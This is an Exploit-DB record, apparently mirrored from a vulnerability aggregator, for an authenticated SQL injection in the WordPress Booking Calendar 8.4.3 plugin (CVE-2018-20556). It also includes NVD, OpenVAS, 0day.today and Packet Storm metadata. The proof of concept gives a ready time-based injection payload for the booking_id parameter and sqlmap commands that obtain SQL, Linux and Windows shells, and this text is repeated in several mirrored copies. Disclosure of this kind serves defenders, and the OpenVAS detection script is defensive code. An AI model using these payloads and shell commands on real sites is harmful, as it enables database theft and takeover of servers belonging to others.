ID EDB-ID:46377 Type exploitdb Reporter Exploit-DB Modified 2019-02-14T00:00:00
Description
# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability
# Date: 2018-12-28
# Exploit Author: B0UG
# Vendor Homepage: https://wpbookingcalendar.com/
# Software Link: https://wordpress.org/plugins/booking/
# Version: Tested on version 8.4.3 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-20556
#I. VULNERABILITY
Authenticated SQL Injection
#II. BACKGROUND
'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.
#III. DESCRIPTION
An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database.
#IV. PROOF OF CONCEPT
1) Access WordPress control panel.
2) Navigate to the Booking Calendar plugin page.
3) Set up Burp Suite to capture the traffic.
4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.
5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.
6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection:
• Boolean based blind injection
• Error based injection
• Time based injection
7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below.
action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67
Obtaining a shell using sqlmap
-----------------------
• Obtain a SQL Shell
Sqlmap –r post-request.txt –p booking_id --sql-shell
• Obtain a Linux Shell
Sqlmap –r post-request.txt –p booking_id --os-shell
• Obtain a Windows Command Prompt
Sqlmap –r post-request.txt –p booking_id --os-cmd
#V. IMPACT
The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.
#VI. SYSTEMS AFFECTED
WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).
#VII. REMEDIATION
Uninstall the plugin until the vulnerability has been fixed by the developer.
#VIII. DISCLOSURE TIMELINE
#December 28, 2018 1: Vulnerability identified.
#December 28, 2018 2: Informed developer of the vulnerability.
#February 14, 2019 3: No communication received back from the developer.
{"id": "EDB-ID:46377", "hash": "87dad190b35283b45d1ea71e87c9e74a", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection", "description": "", "published": "2019-02-14T00:00:00", "modified": "2019-02-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/46377", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2018-20556"], "lastseen": "2019-02-14T19:29:28", "history": [], "viewCount": 81, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-20556"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112548"]}, {"type": "zdt", "idList": ["1337DAY-ID-32184"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151692"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9780"]}], "modified": "2019-02-14T19:29:28"}, "score": {"value": 6.4, "vector": "NONE", "modified": "2019-02-14T19:29:28"}, "vulnersScore": 6.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/46377", "sourceData": "# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability\r\n# Date: 2018-12-28\r\n# Exploit Author: B0UG\r\n# Vendor Homepage: https://wpbookingcalendar.com/\r\n# Software Link: https://wordpress.org/plugins/booking/\r\n# Version: Tested on version 8.4.3 (older versions may also be affected)\r\n# Tested on: WordPress\r\n# Category : Webapps\r\n# CVE: CVE-2018-20556\r\n\r\n#I. VULNERABILITY\r\n\r\nAuthenticated SQL Injection\r\n \r\n#II. BACKGROUND\r\n'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.\r\n\r\n#III. DESCRIPTION\r\nAn authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database. \r\n\r\n#IV. PROOF OF CONCEPT\r\n1) Access WordPress control panel.\r\n2) Navigate to the Booking Calendar plugin page.\r\n3) Set up Burp Suite to capture the traffic.\r\n4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.\r\n5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.\r\n6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection: \r\n\u2022 Boolean based blind injection\r\n\u2022 Error based injection\r\n\u2022 Time based injection\r\n\r\n7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below.\r\naction=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67\r\n\r\nObtaining a shell using sqlmap\r\n-----------------------\r\n\u2022 Obtain a SQL Shell\r\nSqlmap \u2013r post-request.txt \u2013p booking_id --sql-shell\r\n\r\n\u2022 Obtain a Linux Shell\r\nSqlmap \u2013r post-request.txt \u2013p booking_id --os-shell\r\n\r\n\u2022 Obtain a Windows Command Prompt\r\nSqlmap \u2013r post-request.txt \u2013p booking_id --os-cmd\r\n\r\n#V. IMPACT\r\nThe vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.\r\n \r\n#VI. SYSTEMS AFFECTED\r\nWordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).\r\n \r\n#VII. REMEDIATION\r\nUninstall the plugin until the vulnerability has been fixed by the developer.\r\n\r\n#VIII. DISCLOSURE TIMELINE\r\n#December 28, 2018 1: Vulnerability identified.\r\n#December 28, 2018 2: Informed developer of the vulnerability.\r\n#February 14, 2019 3: No communication received back from the developer.", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.exploitdb.ExploitDbBulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:20:04", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in Booking Calendar plugin 8.4.3 for WordPress allows remote attackers to execute arbitrary SQL commands via the booking_id parameter.", "modified": "2019-05-09T16:29:00", "id": "CVE-2018-20556", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20556", "published": "2019-03-21T16:00:00", "title": "CVE-2018-20556", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:32:31", "bulletinFamily": "scanner", "description": "The Wordpress plugin Booking Calendar is prone to an SQL injection vulnerability.", "modified": "2019-03-29T00:00:00", "published": "2019-03-28T00:00:00", "id": "OPENVAS:1361412562310112548", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112548", "title": "WordPress Booking Calendar Plugin < 8.4.5 SQL Injection Vulnerability", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112548\");\n script_version(\"2019-03-29T09:25:06+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-29 09:25:06 +0000 (Fri, 29 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-28 23:28:11 +0100 (Thu, 28 Mar 2019)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-20556\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"WordPress Booking Calendar Plugin < 8.4.5 SQL Injection Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n\n script_tag(name:\"summary\", value:\"The Wordpress plugin Booking Calendar is prone to an SQL injection vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an authenticated attacker to read arbitrary data from the database.\");\n script_tag(name:\"affected\", value:\"WordPress Booking Calendar plugin before version 8.4.5.\");\n script_tag(name:\"solution\", value:\"Update to version 8.4.5 or later.\");\n\n script_xref(name:\"URL\", value:\"https://packetstormsecurity.com/files/151692/WordPress-Booking-Calendar-8.4.3-SQL-Injection.html\");\n script_xref(name:\"URL\", value:\"https://wordpress.org/plugins/booking/#developers\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe: CPE))\n exit(0);\n\nif(!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif(dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/wp-content/plugins/booking/readme.txt\";\nres = http_get_cache(port: port, item: url);\n\nif(\"=== Booking Calendar ===\" >< res && \"Changelog\" >< res) {\n\n vers = eregmatch(pattern: \"Stable tag: ([0-9.]+)\", string: res);\n\n if(vers[1] && version_is_less(version: vers[1], test_version: \"8.4.5\")) {\n report = report_fixed_ver(installed_version: vers[1], fixed_version: \"8.4.5\", file_checked: url);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-02-25T06:41:35", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-02-15T00:00:00", "published": "2019-02-15T00:00:00", "id": "1337DAY-ID-32184", "href": "https://0day.today/exploit/description/32184", "title": "WordPress Booking Calendar 8.4.3 Plugin - Authenticated SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability\r\n# Exploit Author: B0UG\r\n# Vendor Homepage: https://wpbookingcalendar.com/\r\n# Software Link: https://wordpress.org/plugins/booking/\r\n# Version: Tested on version 8.4.3 (older versions may also be affected)\r\n# Tested on: WordPress\r\n# Category : Webapps\r\n# CVE: CVE-2018-20556\r\n\r\n#I. VULNERABILITY\r\n\r\nAuthenticated SQL Injection\r\n \r\n#II. BACKGROUND\r\n'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.\r\n\r\n#III. DESCRIPTION\r\nAn authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database. \r\n\r\n#IV. PROOF OF CONCEPT\r\n1) Access WordPress control panel.\r\n2) Navigate to the Booking Calendar plugin page.\r\n3) Set up Burp Suite to capture the traffic.\r\n4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.\r\n5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.\r\n6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection: \r\n\u2022 Boolean based blind injection\r\n\u2022 Error based injection\r\n\u2022 Time based injection\r\n\r\n7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below.\r\naction=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67\r\n\r\nObtaining a shell using sqlmap\r\n-----------------------\r\n\u2022 Obtain a SQL Shell\r\nSqlmap \u2013r post-request.txt \u2013p booking_id --sql-shell\r\n\r\n\u2022 Obtain a Linux Shell\r\nSqlmap \u2013r post-request.txt \u2013p booking_id --os-shell\r\n\r\n\u2022 Obtain a Windows Command Prompt\r\nSqlmap \u2013r post-request.txt \u2013p booking_id --os-cmd\r\n\r\n#V. IMPACT\r\nThe vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.\r\n \r\n#VI. SYSTEMS AFFECTED\r\nWordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).\r\n \r\n#VII. REMEDIATION\r\nUninstall the plugin until the vulnerability has been fixed by the developer.\r\n\r\n#VIII. DISCLOSURE TIMELINE\r\n#December 28, 2018 1: Vulnerability identified.\r\n#December 28, 2018 2: Informed developer of the vulnerability.\r\n#February 14, 2019 3: No communication received back from the developer.\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32184"}], "wpvulndb": [{"lastseen": "2019-12-11T13:40:48", "bulletinFamily": "software", "description": "WordPress Vulnerability - Booking < 8.4.5.15 - SQL Injection\n", "modified": "2019-11-28T00:00:00", "published": "2019-08-25T00:00:00", "id": "WPVDB-ID:9780", "href": "https://wpvulndb.com/vulnerabilities/9780", "type": "wpvulndb", "title": "Booking < 8.4.5.15 - SQL Injection", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2019-02-16T19:34:21", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-15T00:00:00", "published": "2019-02-15T00:00:00", "id": "PACKETSTORM:151692", "href": "https://packetstormsecurity.com/files/151692/WordPress-Booking-Calendar-8.4.3-SQL-Injection.html", "title": "WordPress Booking Calendar 8.4.3 SQL Injection", "type": "packetstorm", "sourceData": "`# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability \n# Date: 2018-12-28 \n# Exploit Author: B0UG \n# Vendor Homepage: https://wpbookingcalendar.com/ \n# Software Link: https://wordpress.org/plugins/booking/ \n# Version: Tested on version 8.4.3 (older versions may also be affected) \n# Tested on: WordPress \n# Category : Webapps \n# CVE: CVE-2018-20556 \n \n#I. VULNERABILITY \n \nAuthenticated SQL Injection \n \n#II. BACKGROUND \n'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations. \n \n#III. DESCRIPTION \nAn authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database. \n \n#IV. PROOF OF CONCEPT \n1) Access WordPress control panel. \n2) Navigate to the Booking Calendar plugin page. \n3) Set up Burp Suite to capture the traffic. \n4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry. \n5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'. \n6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection: \naC/ Boolean based blind injection \naC/ Error based injection \naC/ Time based injection \n \n7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below. \naction=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67 \n \nObtaining a shell using sqlmap \n----------------------- \naC/ Obtain a SQL Shell \nSqlmap ar post-request.txt ap booking_id --sql-shell \n \naC/ Obtain a Linux Shell \nSqlmap ar post-request.txt ap booking_id --os-shell \n \naC/ Obtain a Windows Command Prompt \nSqlmap ar post-request.txt ap booking_id --os-cmd \n \n#V. IMPACT \nThe vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability. \n \n#VI. SYSTEMS AFFECTED \nWordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected). \n \n#VII. REMEDIATION \nUninstall the plugin until the vulnerability has been fixed by the developer. \n \n#VIII. DISCLOSURE TIMELINE \n#December 28, 2018 1: Vulnerability identified. \n#December 28, 2018 2: Informed developer of the vulnerability. \n#February 14, 2019 3: No communication received back from the developer. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151692/wpbookingcalendar843-sql.txt"}]}
